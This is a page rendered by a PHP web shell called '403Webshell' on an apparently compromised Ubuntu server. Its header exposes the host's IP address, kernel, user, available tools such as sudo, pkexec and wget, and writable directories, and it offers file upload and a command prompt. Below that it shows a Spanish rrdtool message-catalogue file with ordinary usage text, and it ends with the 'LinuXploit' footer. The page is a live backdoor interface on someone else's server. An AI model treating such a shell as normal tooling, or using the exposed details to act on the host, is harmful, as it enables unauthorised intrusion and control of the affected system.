403Webshell
Server IP : 172.67.191.97  /  Your IP : 104.23.197.209
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/locale-langpack/es/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/locale-langpack/es/LC_MESSAGES/rrdtool.mo
�� +�����eM��'�A�
@
DN=�:�l�y���~Yr�tK��yj[��@\��$�������M��0���W�j{~'�!B�#I�#J9$@�$;�$s%�u%!'�.(��(�t)*{�*�
+{�+t=,��,bI-��-�L.+:/f0��1�2��24_3
 	
		[--beta|-y adaptation-parameter]
		[--gamma|-z adaptation-parameter]
		[--gamma-deviation|-v adaptation-parameter]
		[--smoothing-window|-s fraction-of-season]
		[--smoothing-window-deviation|-S fraction-of-season]
		[--aberrant-reset|-b ds-name]
		[--step|-t newstep]
		[--daemon|-D address]
		[DEL:ds-name]
		[DS:ds-spec]
		[DELRRA:index]
		[RRA:rra-spec]
		[RRA#index:[+-=]number]
		[-n|--font FONTTAG:size:font]
		[-m|--zoom factor]
		[-A|--alt-autoscale]
		[-M|--alt-autoscale-max]
		[-G|--graph-render-mode {normal,mono}]
		[-R|--font-render-mode {normal,light,mono}]
		[-B|--font-smoothing-threshold size]
		[-T|--tabwidth width]
		[-E|--slope-mode]
		[-P|--pango-markup]
		[-N|--no-gridfit]
		[-X|--units-exponent value]
		[-L|--units-length value]
		[-S|--step seconds]
		[-f|--imginfo printfstr]
		[-a|--imgformat PNG]
		[-c|--color COLORTAG#rrggbb[aa]]
		[--border width
		[-t|--title string]
		[-W|--watermark string]
		[-Z|--use-nan-for-all-missing-data]
		[DEF:vname=rrd:ds-name:CF]
		[-x|--x-grid x-axis grid and label]
		[-Y|--alt-y-grid] [--full-size-mode]
		[--left-axis-format format]
		[-y|--y-grid y-axis grid and label]
		[-v|--vertical-label string] [-w|--width pixels]
		[--right-axis scale:shift] [--right-axis-label label]
		[--right-axis-format format]
		[-h|--height pixels] [-o|--logarithmic]
		[-u|--upper-limit value] [-z|--lazy]
		[-l|--lower-limit value] [-r|--rigid]
		[-g|--no-legend] [-d|--daemon <address>]
		[-F|--force-rules-legend]
		[-j|--only-graph]
		[CDEF:vname=rpn-expression]
		[VDEF:vdefname=rpn-expression]
		[PRINT:vdefname:format]
		[GPRINT:vdefname:format]
		[COMMENT:text]
		[SHIFT:vname:offset]
		[TEXTALIGN:{left|right|justified|center}]
		[TICK:vname#rrggbb[aa][:[fraction][:legend]]]
		[HRULE:value#rrggbb[aa][:legend]]
		[VRULE:value#rrggbb[aa][:legend]]
		[LINE[width]:vname[#rrggbb[aa][:[legend][:STACK]]]]
		[AREA:vname[#rrggbb[aa][:[legend][:STACK]]]]
		[PRINT:vname:CF:format] (deprecated)
		[GPRINT:vname:CF:format] (deprecated)
		[STACK:vname[#rrggbb[aa][:legend]]] (deprecated)
 * cd - changes the current directory

	rrdtool cd new directory
 * ls - lists all *.rrd files in current directory

	rrdtool ls
 * mkdir - creates a new directory

	rrdtool mkdir newdirectoryname
 * pwd - returns the current working directory

	rrdtool pwd
 * quit - closing a session in remote mode

	rrdtool quit
 * resize - alter the length of one of the RRAs in an RRD

	rrdtool resize filename rranum GROW|SHRINK rows
 * tune -  Modify some basic properties of an RRD

	rrdtool tune filename
		[--heartbeat|-h ds-name:heartbeat]
		[--data-source-type|-d ds-name:DST]
		[--data-source-rename|-r old-name:new-name]
		[--minimum|-i ds-name:min] [--maximum|-a ds-name:max]
		[--deltapos|-p scale-value] [--deltaneg|-n scale-value]
		[--failure-threshold|-f integer]
		[--window-length|-w integer]
		[--alpha|-x adaptation-parameter]
* create - create a new RRD

	rrdtool create filename [--start|-b start time]
		[--step|-s step]
		[--template|-t template-file]
		[--source|-r source-file]
		[--no-overwrite|-O]
		[--daemon|-d address]
		[DS:ds-name:DST:dst arguments]
		[RRA:CF:cf arguments]
* dump - dump an RRD to XML

	rrdtool dump [--header|-h {none,xsd,dtd}]
		[--no-header|-n]
		[--daemon|-d address]
		file.rrd [file.xml]* fetch - fetch data out of an RRD

	rrdtool fetch filename.rrd CF
		[-r|--resolution resolution]
		[-s|--start start] [-e|--end end]
		[-a|--align-start]
		[-d|--daemon <address>]
* first - show first update time for RRA within an RRD

	rrdtool first filename.rrd [--rraindex number] [--daemon|-d address]
* flushcached - flush cached data out to an RRD file

	rrdtool flushcached filename.rrd
		[-d|--daemon <address>]
* graph - generate a graph from one or several RRD

	rrdtool graph filename [-s|--start seconds] [-e|--end seconds]
* graphv - generate a graph from one or several RRD
           with meta data printed before the graph

	rrdtool graphv filename [-s|--start seconds] [-e|--end seconds]
* info - returns the configuration and status of the RRD

	rrdtool info [--daemon|-d <addr> [--noflush|-F]] filename.rrd
* last - show last update time for RRD

	rrdtool last filename.rrd
		[--daemon|-d address]
* lastupdate - returns the most recent datum stored for
  each DS in an RRD

	rrdtool lastupdate filename.rrd
		[--daemon|-d address]
* list - returns the list of RRDs

	rrdtool list [--daemon <address>] [--noflush] <dirname>
* restore - restore an RRD file from its XML form

	rrdtool restore [--range-check|-r] [--force-overwrite|-f] filename.xml filename.rrd
* update - update an RRD

	rrdtool update filename
		[--template|-t ds-name:ds-name:...]
		[--skip-past-updates|-s]
		[--daemon|-d <address>]
		time|N:value[:value...]

		at-time@value[:value...]

		[ time:value[:value...] ..]
* updatev - a verbose version of update
	returns information about values, RRAs, and datasources updated

	rrdtool updatev filename
		[--template|-t ds-name:ds-name:...]
		[--skip-past-updates|-s]
		time|N:value[:value...]

		at-time@value[:value...]

		[ time:value[:value...] ..]
* xport - generate XML dump from one or several RRD

	rrdtool xport [-s|--start seconds] [-e|--end seconds]
		[-m|--maxrows rows]
		[--step seconds]
		[--enumds] [--json]
		[-d|--daemon address]
		[DEF:vname=rrd:ds-name:CF]
		[CDEF:vname=rpn-expression]
		[XPORT:vname:legend]
RRDtool %s  Copyright by Tobias Oetiker <[email protected]>
               Compiled %s %s

Usage: rrdtool [options] command command_options
RRDtool is distributed under the Terms of the GNU General
Public License Version 2. (www.gnu.org/copyleft/gpl.html)

For more information read the RRD manpages
Valid commands: create, update, updatev, graph, graphv,  dump, restore,
		last, lastupdate, first, info, list, fetch, tune,
		resize, xport, flushcached
Valid remote commands: quit, ls, cd, mkdir, pwd
Project-Id-Version: rrdtool
Report-Msgid-Bugs-To: FULL NAME <EMAIL@ADDRESS>
PO-Revision-Date: 2018-01-28 18:43+0000
Last-Translator: Rodrigo Lledó <[email protected]>
Language-Team: Spanish <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Launchpad-Export-Date: 2025-04-10 20:37+0000
X-Generator: Launchpad (build e76edd883483c71c468bb038e98836435de44530)
		[--beta|-y parámetro-de-adaptación]
		[--gamma|-z parámetro-de-adaptación]
		[--gamma-deviation|-v parámetro-de-adaptación]
		[--smoothing-window|-s fracción-de-temporada]
		[--smoothing-window-deviation|-S fracción-de-temporada]
		[--aberrant-reset|-b nombre-ds]
		[--step|-t nuevopaso]
		[--daemon|-D dirección]
		[DEL:nombre-ds]
		[DS:espec-ds]
		[DELRRA:índice]
		[RRA:espec-rra]
		[RRA#índice:[+-=]número]
		[-n|--font ETIQUETAFUENTE:tamaño:tipografía]
		[-m|--zoom factor]
		[-A|--alt-autoescale]
		[-M|--alt-autoscale-max]
		[-G|--graph-render-mode {normal,mono}]
		[-R|--font-render-mode {normal,light,mono}]
		[-B|--font-smoothing-threshold tamaño]
		[-T|--tabwidth ancho]
		[-E|--slope-mode]
		[-P|--pango-markup]
		[-N|--no-gridfit]
		[-X|--units-exponent valor]
		[-L|--units-length valor]
		[-S|--step segundos]
		[-f|--imginfo printfstr]
		[-a|--imgformat PNG]
		[-c|--color COLORTAG#rrggbb[aa]]
		[--border ancho
		[-t|--title cadena]
		[-W|--watermark cadena]
		[-Z|--use-nan-for-all-missing-data]
		[DEF:vname=rrd:ds-name:CF]
		[-x|--x-grid x-axis rejilla y etiqueta]
		[-Y|--alt-y-grid] [--full-size-mode]
		[--left-axis-format formato]
		[-y|--y-grid y-axis rejilla y etiqueta]
		[-v|--vertical-label cadena] [-w|--width píxeles]
		[--right-axis escalar:shift] [--right-axis-label etiqueta]
		[--right-axis-format formato]
		[-h|--height píxeles] [-o|--logarithmic]
		[-u|--upper-limit valor] [-z|--lazy]
		[-l|--lower-limit valor] [-r|--rigid]
		[-g|--no-legend] [-d|--daemon <dirección>]
		[-F|--force-rules-legend]
		[-j|--only-graph]
		[CDEF:vname=rpn-expression]
		[VDEF:vdefname=rpn-expression]
		[PRINT:vdefname:format]
		[GPRINT:vdefname:format]
		[COMMENT:text]
		[SHIFT:vname:offset]
		[TEXTALIGN:{left|right|justified|center}]
		[TICK:vname#rrggbb[aa][:[fraction][:legend]]]
		[HRULE:value#rrggbb[aa][:legend]]
		[VRULE:value#rrggbb[aa][:legend]]
		[LINE[width]:vname[#rrggbb[aa][:[legend][:STACK]]]]
		[AREA:vname[#rrggbb[aa][:[legend][:STACK]]]]
		[PRINT:vname:CF:format] (deprecated)
		[GPRINT:vname:CF:format] (deprecated)
		[STACK:vname[#rrggbb[aa][:legend]]] (deprecated)
 * cd - cambia el directorio actual

	rrdtool cd directorio nuevo
 * ls - lista todos los archivos *.rrd en la carpeta actual

	rrdtool ls
 * mkdir - crea un directorio nuevo

	rrdtool mkdir nombredirectorionuevo
 * pwd - devuelve el directorio de trabajo actual

	rrdtool pwd
 * quit - cierra una sesión en modo remoto

	rrdtool quit
 * resize - altera la longitud de un de los RRA en un RRD

	rrdtool resize nombredearchivo rranum GROW|SHRINK rows
 * tune -  Modifica algunas propiedades básicas de un RRD

	rrdtool tune nombredearchivo
		[--heartbeat|-h ds-name:heartbeat]
		[--data-source-type|-d ds-name:DST]
		[--data-source-rename|-r old-name:new-name]
		[--minimum|-i ds-name:min] [--maximum|-a ds-name:max]
		[--deltapos|-p scale-value] [--deltaneg|-n scale-value]
		[--failure-threshold|-f integer]
		[--window-length|-w integer]
		[--alpha|-x adaptation-parameter]
* create - crea un nuevo RRD

	rrdtool create nombredearchivo [--start|-b start time]
		[--step|-s step]
		[--template|-t template-file]
		[--source|-r source-file]
		[--no-overwrite|-O]
		[--daemon|-d address]
		[DS:ds-name:DST:dst arguments]
		[RRA:CF:cf arguments]
* dump - vuelca un RRD a XML

	rrdtool dump [--header|-h {none,xsd,dtd}]
		[--no-header|-n]
		[--daemon|-d address]
		file.rrd [file.xml]* fetch - extraer datos de un RRD

	rrdtool fetch nombredearchivo.rrd CF
		[-r|--resolution resolution]
		[-s|--start start] [-e|--end end]
		[-a|--align-start]
		[-d|--daemon <address>]
* first - muestra el momento de la primera actualización de RRA entre un RRD

	rrdtool first nombredearchivo.rrd [--rraindex number] [--daemon|-d address]
* flushcached - vacia los datos de caché a un archivo RRD

	rrdtool flushcached nombredearchivo.rrd
		[-d|--daemon <address>]
* graph - genera un gráfico de uno o más RRD

	rrdtool graph nombre de archivo [-s|--start segundos] [-e|--end segundos]
* graphv - genera un gráfico a partir de uno o varios RRD
           con medatados impresos antes del gráfico

	rrdtool graphv archivo [-s|--start segundos] [-e|--end segundos]
* info - proporciona la configuración y el estado del RRD

	rrdtool info [--daemon|-d <addr> [--noflush|-F]] filename.rrd
* last - muestra la última vez que se actualizó el RRD

	rrdtool last nombredearchivo.rrd
		[--daemon|-d address]
* lastupdate - proporciona el dato almacenado más reciente para
  cada DS en un RRD

	rrdtool lastupdate nombredearchivo.rrd
		[--daemon|-d address]
* list - devuelve la lista de RRDs

	rrdtool list [--daemon <dirección>] [--noflush] <nombredir>
*restore - restaura un archivo RRD desde su formulario XML

	rrdtool restore [--range-check|-r] [--force-overwrite|-f] nombredearchivo.xml nombredearchivo.rrd
* update - actualiza un RRD

	rrdtool update nombredearchivo
		[--template|-t ds-name:ds-name:...]
		[--skip-past-updates|-s]
		[--daemon|-d <address>]
		time|N:value[:value...]

		at-time@value[:value...]

		[ time:value[:value...] ..]
* updatev - version larga de update
	proporciona información sobre valores, RRAs, y fuentes de datos actualizados

	rrdtool updatev nombredearchivo
		[--template|-t ds-name:ds-name:...]
		[--skip-past-updates|-s]
		time|N:value[:value...]

		at-time@value[:value...]

		[ time:value[:value...] ..]
* xport - genera un volcado en XML de uno o varios RRD

	rrdtool xport [-s|--start segundos] [-e|--end segundos]
		[-m|--maxrows filas]
		[--step segundos]
		[--enumds] [--json]
		[-d|--daemon dirección]
		[DEF:vname=rrd:ds-name:CF]
		[CDEF:vname=rpn-expression]
		[XPORT:vname:legend]
RRDtool %s  Copyright por Tobias Oetiker <[email protected]>
               Compilado %s %s

Uso: rrdtool [opciones] órden opciones_órden
RRDtool se distribuye bajo los términos de la GNU General
Public License Versión 2. (www.gnu.org/copyleft/gpl.html)

Para más información lea las páginas de manual de RRD
Comandos válidos: create, update, updatev, graph, graphv,  dump, restore,
		last, lastupdate, first, info, list, fetch, tune,
		resize, xport, flushcached
Órdenes remotas válidas: quit, ls, cd, mkdir, pwd

Youez - 2016 - github.com/yon3zu
LinuXploit